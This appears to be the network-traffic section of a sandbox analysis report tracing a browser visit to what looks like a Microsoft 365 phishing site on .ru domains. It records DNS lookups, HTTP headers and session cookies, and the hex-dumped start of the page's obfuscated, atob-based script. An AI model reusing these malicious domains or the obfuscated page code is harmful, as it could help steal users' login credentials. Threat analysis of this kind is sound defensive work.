                                                          Jan 9, 2025 21:12:15.529211998 CET138138192.168.2.4192.168.2.255
                                                          Jan 9, 2025 21:12:15.556497097 CET5765353192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:15.556633949 CET5600153192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:15.563353062 CET53576531.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:15.564035892 CET53560011.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:15.586575031 CET5941153192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:15.586688995 CET6166653192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:15.593439102 CET53616661.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:15.593534946 CET53594111.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:17.844197989 CET5199853192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:17.844336987 CET5482253192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:17.855190039 CET53519981.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:17.855365992 CET53548221.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:25.670523882 CET53552231.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:29.624982119 CET5459553192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:29.625130892 CET6193153192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:29.684241056 CET53619311.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:29.837825060 CET53545951.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:31.431037903 CET6551053192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:31.431155920 CET5396453192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:31.455867052 CET5482653192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:31.456257105 CET6402753192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:31.547960043 CET53548261.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:31.711977959 CET53640271.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:32.491405964 CET5843153192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:32.491676092 CET6170253192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:32.502141953 CET53617021.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:34.673322916 CET5814353192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:34.673486948 CET5608853192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:34.710635900 CET53560881.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:35.799511909 CET6153053192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:35.799673080 CET5570653192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:35.806541920 CET53615301.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:35.807293892 CET53557061.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:41.052701950 CET53558251.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:44.778822899 CET53601201.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:12:51.530600071 CET6320353192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:12:51.530731916 CET5451253192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:13:07.280706882 CET53577021.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:13:07.731901884 CET53587981.1.1.1192.168.2.4
                                                          Jan 9, 2025 21:13:17.849967957 CET6067453192.168.2.41.1.1.1
                                                          Jan 9, 2025 21:13:17.850334883 CET5491653192.168.2.41.1.1.1
                                                          TimestampSource IPDest IPChecksumCodeType
                                                          Jan 9, 2025 21:12:13.362123013 CET192.168.2.41.1.1.1c281(Port unreachable)Destination Unreachable
                                                          Jan 9, 2025 21:12:31.715348959 CET192.168.2.41.1.1.1c2b4(Port unreachable)Destination Unreachable
                                                          Jan 9, 2025 21:12:34.660996914 CET192.168.2.41.1.1.1c2dc(Port unreachable)Destination Unreachable
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 9, 2025 21:12:11.180063009 CET192.168.2.41.1.1.10xc672Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:11.180236101 CET192.168.2.41.1.1.10xcbe6Standard query (0)www.google.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:13.057625055 CET192.168.2.41.1.1.10x8f63Standard query (0)cesinc365.xemitronax.ruA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:13.059463978 CET192.168.2.41.1.1.10x62d7Standard query (0)cesinc365.xemitronax.ru65IN (0x0001)false
                                                          Jan 9, 2025 21:12:13.160763979 CET192.168.2.41.1.1.10x7c47Standard query (0)cesinc365.xemitronax.ruA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:13.160913944 CET192.168.2.41.1.1.10x3b5cStandard query (0)cesinc365.xemitronax.ru65IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.251019955 CET192.168.2.41.1.1.10x43dbStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.251960993 CET192.168.2.41.1.1.10xfb53Standard query (0)code.jquery.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.252516031 CET192.168.2.41.1.1.10x215aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.252981901 CET192.168.2.41.1.1.10x65f0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.253344059 CET192.168.2.41.1.1.10xc110Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.253501892 CET192.168.2.41.1.1.10x4138Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.982697010 CET192.168.2.41.1.1.10xdeb4Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.982880116 CET192.168.2.41.1.1.10xce77Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.132025957 CET192.168.2.41.1.1.10xad6Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.132225990 CET192.168.2.41.1.1.10x48aeStandard query (0)code.jquery.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.556497097 CET192.168.2.41.1.1.10x713aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.556633949 CET192.168.2.41.1.1.10xdfe4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.586575031 CET192.168.2.41.1.1.10x8b2eStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.586688995 CET192.168.2.41.1.1.10x2a3fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:17.844197989 CET192.168.2.41.1.1.10xe8f8Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:17.844336987 CET192.168.2.41.1.1.10x62b7Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:29.624982119 CET192.168.2.41.1.1.10x97d4Standard query (0)jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ruA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:29.625130892 CET192.168.2.41.1.1.10xd494Standard query (0)jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru65IN (0x0001)false
                                                          Jan 9, 2025 21:12:31.431037903 CET192.168.2.41.1.1.10x10c1Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:31.431155920 CET192.168.2.41.1.1.10x2dcdStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:31.455867052 CET192.168.2.41.1.1.10x2ca6Standard query (0)jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ruA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:31.456257105 CET192.168.2.41.1.1.10xe14bStandard query (0)jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru65IN (0x0001)false
                                                          Jan 9, 2025 21:12:32.491405964 CET192.168.2.41.1.1.10x58f1Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:32.491676092 CET192.168.2.41.1.1.10x7441Standard query (0)www.office.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:34.673322916 CET192.168.2.41.1.1.10x22fdStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:34.673486948 CET192.168.2.41.1.1.10x6eb2Standard query (0)www.office.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:35.799511909 CET192.168.2.41.1.1.10x93afStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:35.799673080 CET192.168.2.41.1.1.10xccf6Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                          Jan 9, 2025 21:12:51.530600071 CET192.168.2.41.1.1.10x1c64Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:51.530731916 CET192.168.2.41.1.1.10x894eStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                          Jan 9, 2025 21:13:17.849967957 CET192.168.2.41.1.1.10x91c3Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:13:17.850334883 CET192.168.2.41.1.1.10x8971Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 9, 2025 21:12:11.187069893 CET1.1.1.1192.168.2.40xc672No error (0)www.google.com142.250.74.196A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:11.187246084 CET1.1.1.1192.168.2.40xcbe6No error (0)www.google.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:13.150459051 CET1.1.1.1192.168.2.40x8f63No error (0)cesinc365.xemitronax.ru188.114.97.3A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:13.150459051 CET1.1.1.1192.168.2.40x8f63No error (0)cesinc365.xemitronax.ru188.114.96.3A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:13.158360004 CET1.1.1.1192.168.2.40x62d7No error (0)cesinc365.xemitronax.ru65IN (0x0001)false
                                                          Jan 9, 2025 21:12:13.168622017 CET1.1.1.1192.168.2.40x7c47No error (0)cesinc365.xemitronax.ru188.114.96.3A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:13.168622017 CET1.1.1.1192.168.2.40x7c47No error (0)cesinc365.xemitronax.ru188.114.97.3A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:13.361996889 CET1.1.1.1192.168.2.40x3b5cNo error (0)cesinc365.xemitronax.ru65IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.257709026 CET1.1.1.1192.168.2.40x43dbNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.257709026 CET1.1.1.1192.168.2.40x43dbNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.257709026 CET1.1.1.1192.168.2.40x43dbNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.257709026 CET1.1.1.1192.168.2.40x43dbNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.259121895 CET1.1.1.1192.168.2.40x215aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.259121895 CET1.1.1.1192.168.2.40x215aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.260330915 CET1.1.1.1192.168.2.40x65f0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.260447979 CET1.1.1.1192.168.2.40xc110No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.260447979 CET1.1.1.1192.168.2.40xc110No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.262026072 CET1.1.1.1192.168.2.40x4138No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.990209103 CET1.1.1.1192.168.2.40xdeb4No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.990209103 CET1.1.1.1192.168.2.40xdeb4No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:14.990340948 CET1.1.1.1192.168.2.40xce77No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.139547110 CET1.1.1.1192.168.2.40xad6No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.139547110 CET1.1.1.1192.168.2.40xad6No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.139547110 CET1.1.1.1192.168.2.40xad6No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.139547110 CET1.1.1.1192.168.2.40xad6No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.563353062 CET1.1.1.1192.168.2.40x713aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.563353062 CET1.1.1.1192.168.2.40x713aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.564035892 CET1.1.1.1192.168.2.40xdfe4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.593439102 CET1.1.1.1192.168.2.40x2a3fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.593534946 CET1.1.1.1192.168.2.40x8b2eNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:15.593534946 CET1.1.1.1192.168.2.40x8b2eNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:17.855190039 CET1.1.1.1192.168.2.40xe8f8No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:29.684241056 CET1.1.1.1192.168.2.40xd494No error (0)jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru65IN (0x0001)false
                                                          Jan 9, 2025 21:12:29.837825060 CET1.1.1.1192.168.2.40x97d4No error (0)jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru172.67.195.229A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:29.837825060 CET1.1.1.1192.168.2.40x97d4No error (0)jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru104.21.60.111A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:31.438102961 CET1.1.1.1192.168.2.40x10c1No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:31.438340902 CET1.1.1.1192.168.2.40x2dcdNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:31.547960043 CET1.1.1.1192.168.2.40x2ca6No error (0)jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru172.67.195.229A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:31.547960043 CET1.1.1.1192.168.2.40x2ca6No error (0)jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru104.21.60.111A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:31.711977959 CET1.1.1.1192.168.2.40xe14bNo error (0)jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru65IN (0x0001)false
                                                          Jan 9, 2025 21:12:32.502141953 CET1.1.1.1192.168.2.40x7441No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:32.502141953 CET1.1.1.1192.168.2.40x7441No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:32.502999067 CET1.1.1.1192.168.2.40x58f1No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:32.502999067 CET1.1.1.1192.168.2.40x58f1No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:33.695585966 CET1.1.1.1192.168.2.40x1f7eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:33.695585966 CET1.1.1.1192.168.2.40x1f7eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:34.650748968 CET1.1.1.1192.168.2.40x8acbNo error (0)shed.dual-low.s-part-0033.t-0009.t-msedge.nets-part-0033.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:34.650748968 CET1.1.1.1192.168.2.40x8acbNo error (0)s-part-0033.t-0009.t-msedge.net13.107.246.61A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:34.680342913 CET1.1.1.1192.168.2.40x22fdNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:34.680342913 CET1.1.1.1192.168.2.40x22fdNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:34.710635900 CET1.1.1.1192.168.2.40x6eb2No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:34.710635900 CET1.1.1.1192.168.2.40x6eb2No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:35.806541920 CET1.1.1.1192.168.2.40x93afNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:35.806541920 CET1.1.1.1192.168.2.40x93afNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:35.806541920 CET1.1.1.1192.168.2.40x93afNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 21:12:35.807293892 CET1.1.1.1192.168.2.40xccf6No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:35.807293892 CET1.1.1.1192.168.2.40xccf6No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:51.537678957 CET1.1.1.1192.168.2.40x894eNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:12:51.538090944 CET1.1.1.1192.168.2.40x1c64No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:13:17.857172012 CET1.1.1.1192.168.2.40x8971No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 9, 2025 21:13:17.857825994 CET1.1.1.1192.168.2.40x91c3No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                          • cesinc365.xemitronax.ru
                                                          • https:
                                                            • cdnjs.cloudflare.com
                                                            • challenges.cloudflare.com
                                                            • code.jquery.com
                                                            • jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru
                                                          • a.nel.cloudflare.com
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449740188.114.96.34436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:13 UTC672OUTGET /9FAvn/ HTTP/1.1
                                                          Host: cesinc365.xemitronax.ru
                                                          Connection: keep-alive
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:14 UTC1248INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: no-cache, private
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EzpJnDJicfu%2BuWm480CKm6mrpyHRhFBO0BSknDRUNl0RqtCI2dVA2Ln%2F%2FG5zMgzy6y47k%2FYRGL6NW43XbdctmDoQ1ULA3h8AzW%2BRW07x8bkbEq2vLn46o%2Bbn4k3HUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5502&min_rtt=5484&rtt_var=2093&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1584&delivery_rate=505681&cwnd=250&unsent_bytes=0&cid=2b82abeadefe8acc&ts=177&x=0"
                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IlExeTdtZkpYM0QwQitySVJNVDEvcXc9PSIsInZhbHVlIjoiR3U1UHBJS00zOVNycThlM2hIUzJUZ05HUCtJUWUraGdwRzFNYTU4c3M3Uk1mWnRJbVNDT044Vnp1MHVtcHp4VDR2VG1qU21meVliYXh5ZkFQckZkZ2U5ZmlmVFp0ZE9scVJ1VHRibnYxSHZ2QWRGajBmTC9LK3lNQ0E3SFlvdEwiLCJtYWMiOiJjZDZjMWY1MjA1MjZjNzg4ZmIyZTk3MDg0YzkyZTY3NjVlOTBiNDBmMTYzZGIzNzQ1N2VlMGI5NGRiMTE1ZjNkIiwidGFnIjoiIn0%3D; expires=Thu, 09-Jan-2025 22:12:14 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                          2025-01-09 20:12:14 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 70 6d 4f 45 5a 72 59 33 42 4a 53 56 5a 54 5a 30 78 6a 55 54 5a 73 53 45 78 61 53 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 44 46 4b 4e 32 56 30 4b 31 6f 76 4e 43 73 33 4e 6c 4e 31 53 48 46 51 4e 33 56 77 61 6b 45 79 52 6b 64 53 65 6a 64 55 64 6a 68 77 53 47 46 47 52 32 63 34 63 33 5a 44 55 30 77 7a 4d 6c 56 52 61 47 74 50 4d 53 39 49 57 53 39 56 61 6d 4e 52 52 32 51 30 56 7a 4a 75 61 55 70 74 4e 55 52 6f 4d 31 5a 30 4f 56 42 31 51 55 46 45 63 31 67 72 51 55 4e 4a 64 45 77 35 4d 57 59 30 4f 56 46 50 57 55 39 4f 55 6c 70 51 64 58 55 34 55 54 46 31 54 54 64 79 52 44 6c 6d 64 57 52 6c 65 6b 4a 42 57 6c 64 74 5a 30 31 42 4c 33 63
                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkpmOEZrY3BJSVZTZ0xjUTZsSExaS2c9PSIsInZhbHVlIjoiTDFKN2V0K1ovNCs3NlN1SHFQN3VwakEyRkdSejdUdjhwSGFGR2c4c3ZDU0wzMlVRaGtPMS9IWS9VamNRR2Q0VzJuaUptNURoM1Z0OVB1QUFEc1grQUNJdEw5MWY0OVFPWU9OUlpQdXU4UTF1TTdyRDlmdWRlekJBWldtZ01BL3c
                                                          2025-01-09 20:12:14 UTC1369INData Raw: 31 38 35 35 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 74 68 65 20 6b 65 79 20 74 6f 20 68 61 70 70 69 6e 65 73 73 2e 20 48 61 70 70 69 6e 65 73 73 20 69 73 20 74 68 65 20 6b 65 79 20 74 6f 20 73 75 63 63 65 73 73 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 4e 65 76 65 72 20 67 69 76 65 20 69 6e 20 65 78 63 65 70 74 20 74 6f 20 63 6f 6e 76 69 63 74 69 6f 6e 73 20 6f 66 20 68 6f 6e 6f 72 20 61 6e 64 20 67 6f 6f 64 20 73 65 6e 73 65 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 54 68 65 20 6f 6e 6c 79 20 70 6c 61 63 65 20 77 68 65 72 65 20 73 75 63 63 65 73 73 20 63 6f 6d 65 73 20 62 65 66 6f 72 65 20 77 6f 72 6b 20 69 73 20 69 6e 20 74 68 65 20 64 69 63 74 69 6f 6e 61 72 79 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52
                                                          Data Ascii: 1855... Success is not the key to happiness. Happiness is the key to success. -->... Never give in except to convictions of honor and good sense. --><script>/* The only place where success comes before work is in the dictionary. */if(atob("aHR
                                                          2025-01-09 20:12:14 UTC1369INData Raw: 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 32 68 72 55 48 4e 46 64 6d 4e 77 57 55 6f 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 61 47 74 51 63 30 56 32 59 33 42 5a 53 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 68 72 55 48 4e 46 64 6d 4e 77 57 55 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 68 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47
                                                          Data Ascii: kaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2hrUHNFdmNwWUogaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojaGtQc0V2Y3BZSiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2hrUHNFdmNwWUouY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOThweDsvKndpZHRoOiAxMDAlOyovcGFkZG
